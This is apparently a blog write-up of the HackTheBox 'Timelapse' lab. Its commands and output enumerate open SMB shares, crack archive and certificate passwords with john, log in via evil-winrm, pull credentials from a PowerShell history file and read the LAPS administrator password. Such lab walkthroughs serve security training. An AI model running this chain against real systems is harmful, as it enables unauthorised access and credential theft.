HackTheBox - Timelapse
Configuration
It is very useful to append /etc/hosts/
with ip address of the machine. It is useful to get subdomains and to not memorize the address every time.
1
$ echo '10.10.11.152 timelapse.htb' | sudo tee -a /etc/hosts
Reconnaissance
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
$ nmap -p- timelapse.htb -Pn
Starting Nmap 7.92 ( https://nmap.org ) at 2022-06-29 11:10 UTC
Nmap scan report for timelapse.htb (10.10.11.152)
Host is up (0.056s latency).
Not shown: 65517 filtered tcp ports (no-response)
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5986/tcp open wsmans
9389/tcp open adws
49667/tcp open unknown
49673/tcp open unknown
49674/tcp open unknown
49696/tcp open unknown
62020/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 111.03 seconds
It looks like an Active Directory
domain.
Enumeration
Let’s start with smb enumeration. It is also can be done by simple smbclient
.
1
2
3
4
5
6
7
8
9
10
11
12
$ crackmapexec smb timelapse.htb -u 'a' -p '' --shares
SMB timelapse.htb 445 DC01 [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:timelapse.htb) (signing:True) (SMBv1:False)
SMB timelapse.htb 445 DC01 [+] timelapse.htb\a:
SMB timelapse.htb 445 DC01 [+] Enumerated shares
SMB timelapse.htb 445 DC01 Share Permissions Remark
SMB timelapse.htb 445 DC01 ----- ----------- ------
SMB timelapse.htb 445 DC01 ADMIN$ Remote Admin
SMB timelapse.htb 445 DC01 C$ Default share
SMB timelapse.htb 445 DC01 IPC$ READ Remote IPC
SMB timelapse.htb 445 DC01 NETLOGON Logon server share
SMB timelapse.htb 445 DC01 Shares READ
SMB timelapse.htb 445 DC01 SYSVOL Logon server share
We can read 2 shares without login, now we connect with smbclient
and search.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
$ smbclient -N \\\\timelapse.htb\\Shares\\
smb: \> dir
. D 0 Mon Oct 25 15:39:15 2021
.. D 0 Mon Oct 25 15:39:15 2021
Dev D 0 Mon Oct 25 19:40:06 2021
HelpDesk D 0 Mon Oct 25 15:48:42 2021
6367231 blocks of size 4096. 1680031 blocks available
smb: \> cd Dev
smb: \Dev\> dir
. D 0 Mon Oct 25 19:40:06 2021
.. D 0 Mon Oct 25 19:40:06 2021
winrm_backup.zip A 2611 Mon Oct 25 15:46:42 2021
6367231 blocks of size 4096. 1680031 blocks available
smb: \Dev\> get winrm_backup.zip
smb: \Dev\> cd ..
smb: \> cd HelpDesk
smb: \HelpDesk\> dir
. D 0 Mon Oct 25 15:48:42 2021
.. D 0 Mon Oct 25 15:48:42 2021
LAPS.x64.msi A 1118208 Mon Oct 25 14:57:50 2021
LAPS_Datasheet.docx A 104422 Mon Oct 25 14:57:46 2021
LAPS_OperationsGuide.docx A 641378 Mon Oct 25 14:57:40 2021
LAPS_TechnicalSpecification.docx A 72683 Mon Oct 25 14:57:44 2021
6367231 blocks of size 4096. 1680031 blocks available
smb: \HelpDesk\> mget *
winrm_backup.zip archive has a password, we will try to brute it with john
.
1
2
3
$ zip2john winrm_backup.zip > hash
$ john --wordlist=rockyou.txt hash
-- EDITED -- (winrm_backup.zip/legacyy_dev_auth.pfx)
legacyy_dev_auth.pfx is a PKCS#12
file format, contains the SSL certificate (public keys) and the corresponding private keys. But it requires password to extract. Let’s convert it to hash and brute it again!
1
2
3
$ pfx2john legacyy_dev_auth.pfx > hash
$ john --wordlist=rockyou.txt hash
-- EDITED -- (legacyy_dev_auth.pfx)
Now we got the password and able to extract a certificate and a private key. We use openssl
library to do that.
1
2
$ openssl pkcs12 -in legacyy_dev_auth.pfx -nocerts -out private.key
$ openssl pkcs12 -in legacyy_dev_auth.pfx -clcerts -nokeys -out certificate.crt
user.txt
Now we have a certificate and a private key. We can use them to auth into the machine with evil-winrm
.
1
2
3
4
5
$ evil-winrm -i timelapse.htb -S -k private.key -c certificate.crt
*Evil-WinRM* PS C:\Users\legacyy\Documents>
*Evil-WinRM* PS C:\Users\legacyy\Documents> cd ..
*Evil-WinRM* PS C:\Users\legacyy> type Desktop\user.txt
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX # Edited
root.txt
Here we have to search. By searching in Program Files
folder, we have to note that LAPS
in installed and enabled. We can upload and execute winPEAS
. It will show us a command history file.
Let’s open it!
1
2
3
4
5
6
7
8
9
10
11
*Evil-WinRM* PS C:\Users\legacyy\Downloads> type C:\Users\legacyy\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
whoami
ipconfig /all
netstat -ano |select-string LIST
$so = New-PSSessionOption -SkipCACheck -SkipCNCheck -SkipRevocationCheck
$p = ConvertTo-SecureString '-- EDITED --' -AsPlainText -Force
$c = New-Object System.Management.Automation.PSCredential ('svc_deploy', $p)
invoke-command -computername localhost -credential $c -port 5986 -usessl -
SessionOption $so -scriptblock {whoami}
get-aduser -filter * -properties *
exit
We can see the credentials here: svc_deploy:-- EDITED --
.
svc_deploy user is a member of LAPS_Readers
group, which can extract Local Administrator
password. We are using crackmapexec
to do that.
1
2
3
$ crackmapexec smb timelapse.htb -u 'svc_deploy' -p '-- EDITED --' --laps
SMB timelapse.htb 445 DC01 [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:timelapse.htb) (signing:True) (SMBv1:False)
SMB timelapse.htb 445 DC01 [-] DC01\administrator:-- EDITED -- STATUS_LOGON_FAILURE
Then, we got it: administrator:-- EDITED --
. It’s time to log in and get the flag!
1
2
3
4
5
6
$ evil-winrm -i timelapse.htb -u 'administrator' -p '-- EDITED --' -S
*Evil-WinRM* PS C:\Users\Administrator\Documents> gci -Path C:\ -Recurse -Include 'root.txt'
Directory: C:\Users\TRX\Desktop
-ar--- 7/1/2022 9:25 AM 34 root.txt
*Evil-WinRM* PS C:\Users\Administrator\Documents> type ../../TRX/Desktop/root.txt
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX # Edited
It was in unusual location, so we had to search for it with Get-ChildItem
.
Conclusion
I’ve really enjoyed the box. It was interesting to learn some new things.
Thank you for reading, I hope it was useful for you ❤️